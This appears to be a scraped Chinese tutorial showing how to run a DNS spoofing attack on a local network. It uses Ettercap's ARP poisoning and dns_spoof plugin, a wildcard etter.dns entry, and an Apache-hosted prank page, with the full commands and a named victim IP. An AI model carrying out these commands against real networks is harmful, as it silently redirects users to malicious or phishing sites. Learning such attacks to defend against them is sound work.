您的位置首页  散文小品

dns欺骗攻击(dns欺骗攻击会怎么样)一篇读懂

攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或钓鱼网页-浏览器依然显示正常的url。

dns欺骗攻击(dns欺骗攻击会怎么样)一篇读懂

 

DNS欺骗攻击基于中间人攻击攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或钓鱼网页-浏览器依然显示正常的url本帖介绍怎么使用Ettercap施行DNS欺骗攻击,实现受害者访问任何网站都转向到攻击者指定的网站。

情形描述同一局域网内受害者IP:192.168.0.106攻击者系统Kali Linux,IP地址:192.168.0.108创建恶搞网站在Kali Linux上创建恶搞网站启动Apache:# service apache2 start 。

创建恶搞网页:# vim /var/www/html/index.html 写入内容:

You Got Fucked!

你可以测试一下(http://192.168.0.108),看看Web是否可以正常提供服务。

DNS欺骗攻击编辑文件:# vim /etc/ettercap/etter.dns 在文件中添加一行:* A 192.168.0.108 所有域名查询都解析为Kali Linux的IP地址DNS欺骗/ARP欺骗:。

# ettercap -i wlan0 -T -P dns_spoof -M arp /192.168.0.106///

测试受害者访问网站:

注意:地址栏的URL并没有变你也可以使用nslookup命令查询DNS解析结果:nslookup www.baidu.com Kali Linux中另一个执行这种攻击的工具:dnsspoof# man dnsspoof 。

免责声明:本站所有信息均搜集自互联网,并不代表本站观点,本站不对其真实合法性负责。如有信息侵犯了您的权益,请告知,本站将立刻处理。联系QQ:1640731186